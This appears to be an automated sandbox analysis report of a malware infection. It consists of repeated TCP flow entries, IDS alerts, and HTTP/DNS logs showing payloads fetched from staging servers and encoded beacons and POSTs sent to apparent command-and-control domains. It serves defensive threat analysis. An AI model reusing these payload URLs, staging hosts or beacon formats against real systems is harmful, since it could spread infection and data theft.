            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeDNS query: www.2886080.xyz
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeDNS query: www.kcrkimya.xyz
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/WRG.txt HTTP/1.1Host: 192.210.150.33Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8DE86AB.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /GmwgTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jiourl.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.150.33Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/mekissedbutterburnwithstronglips.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.150.33Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/WRG.txt HTTP/1.1Host: 192.210.150.33Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /0ulx/?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46 HTTP/1.1Host: www.magicface.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3200000.zip HTTP/1.1User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L46 HTTP/1.1Host: www.gymuniversity.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /weeg/?o4=jn1L46&wxW=+t9vfnkbYU1QJIfziniMQm4D0SJKDGsGeZHR+z4AZEyX1J3gptrY73VQNNQ/+mGIVtW5Aqaflf0RAZz5+q7KDi1WF5zu290DE+JeXwSEBwj5ukFt81bZJ4VTl/P9 HTTP/1.1Host: www.2886080.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L46 HTTP/1.1Host: www.kcrkimya.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: jiourl.com
            Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: www.magicface.shop
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.gymuniversity.net
            Source: global trafficDNS traffic detected: DNS query: www.2886080.xyz
            Source: global trafficDNS traffic detected: DNS query: www.jnnotary.org
            Source: global trafficDNS traffic detected: DNS query: www.kcrkimya.xyz
            Source: unknownHTTP traffic detected: POST /rvs7/ HTTP/1.1Host: www.gymuniversity.netAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.gymuniversity.netReferer: http://www.gymuniversity.net/rvs7/Content-Length: 2160Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)Data Raw: 77 78 57 3d 5a 53 33 57 77 75 78 36 4d 79 32 4d 53 4c 41 57 46 61 65 77 75 58 6f 2f 7a 34 38 74 46 6a 48 64 2b 57 6a 59 76 63 6c 31 7a 47 61 41 35 6f 72 39 73 68 47 2b 79 47 71 58 35 41 36 4b 53 43 56 57 51 2b 57 42 65 6e 2f 6b 4e 41 70 48 2b 75 37 41 55 39 34 79 57 4f 59 41 2f 62 37 77 6e 7a 44 73 65 67 54 30 37 56 55 38 63 32 69 52 4f 45 6e 39 73 51 2b 57 6c 71 74 51 64 46 71 77 76 6a 34 71 48 38 79 70 31 2f 51 6a 41 44 56 77 47 55 78 41 34 4f 72 65 4a 65 33 36 42 6f 76 48 2f 77 6b 6b 63 39 46 4a 41 6c 63 4b 2f 6a 37 6a 61 64 72 73 33 7a 57 78 6c 78 55 61 4d 48 37 39 41 62 52 4b 67 48 62 73 74 78 32 6a 2f 58 34 70 77 50 6e 54 36 64 76 35 70 75 4c 39 71 47 78 66 33 32 72 50 4c 32 78 53 6b 4a 38 64 6e 30 79 38 61 6e 58 36 44 76 6c 56 54 64 4d 66 50 38 64 6c 54 5a 51 67 74 65 4b 43 67 6f 37 43 31 72 62 6e 30 6e 76 38 6b 77 33 32 6c 58 4f 59 71 61 70 47 55 44 50 31 63 66 4d 33 30 5a 4f 62 76 31 34 46 37 6a 78 66 75 72 73 58 78 77 69 75 76 45 48 38 43 5a 7a 64 61 5a 50 67 76 6c 4b 77 52 46 64 45 75 2f 58 74 64 47 76 31 52 53 6a 6a 4d 33 73 30 7a 58 32 46 34 30 48 74 45 32 6b 38 64 2f 46 43 55 70 55 70 35 56 30 66 43 6a 35 4b 45 43 4e 38 6b 49 37 4f 6f 48 45 4a 64 65 59 30 39 41 62 45 48 79 50 2b 52 62 70 72 72 74 6c 45 4d 73 6f 77 4b 6e 2b 63 70 63 70 79 34 4d 4d 53 4d 69 74 76 36 78 4b 32 6a 74 70 6b 78 33 31 58 39 75 67 48 65 31 55 70 6d 66 58 52 5a 55 59 6f 47 58 36 47 35 66 78 54 50 72 34 58 54 55 48 33 42 78 79 4c 48 65 41 70 76 33 32 74 55 4f 36 43 78 36 73 32 64 64 30 76 73 68 5a 55 46 51 52 58 76 72 49 48 62 70 61 30 79 30 36 6d 5a 77 37 2b 52 75 57 69 69 43 52 34 34 37 7a 6a 65 42 31 43 73 48 66 4a 54 35 38 31 6f 34 61 71 4c 36 6c 6d 38 56 75 4b 51 4f 30 56 62 63 73 42 4b 6b 36 39 37 5a 36 30 6b 52 6e 62 74 6b 78 71 61 44 57 5a 44 34 32 78 46 43 68 7a 2f 68 79 69 47 6f 64 62 69 47 33 42 42 5a 6b 6c 31 4e 76 64 63 45 4e 46 42 79 49 44 43 46 62 70 46 6b 75 53 48 77 6f 37 59 75 69 6c 71 42 45 6d 33 68 78 77 50 73 32 36 4d 69 54 44 36 67 41 62 54 31 34 74 68 68 75 4c 6c 38 75 57 4e 52 36 4f 74 6f 74 6e 6f 78 47 4d 2b 50 33 51 57 63 75 64 63 47 44 31 62 74 4e 39 39 73 79 33 62 6e 4d 72 48 38 5a 71 65 35 55 6e 78 52 43 78 32 2f 5a 73 65 77 2f 35 34 45 6c 78 76 53 75 50 36 62 51 30 53 73 79 4b 64 71 31 73 32 4d 44 31 4f 54 4a 63 43 6c 4a 34 4c 71 54 59 52 77 52 74 6a 53 31 62 55 34 30 69 53 47 76 39 6d 78 75 6b 51 4f 37 56 74 45 63 31 67 6f 4c 6c 46 42 42 51 72 7a 45 6f 74 34 34 74 58 4c 4f 74 35 66 41 59 78 6e 4a 65 5a 74 35 52 30 67 74 59 4f 69 5a 4c 4e 58 4d 6b 73 46 66 2f 69 39 78 47 4d 37 6b 55 72 6a 32 52 72 4c 61 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cdcb27b3-da02-4096-b5d1-f406d443117ax-runtime: 0.043189content-length: 20068connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 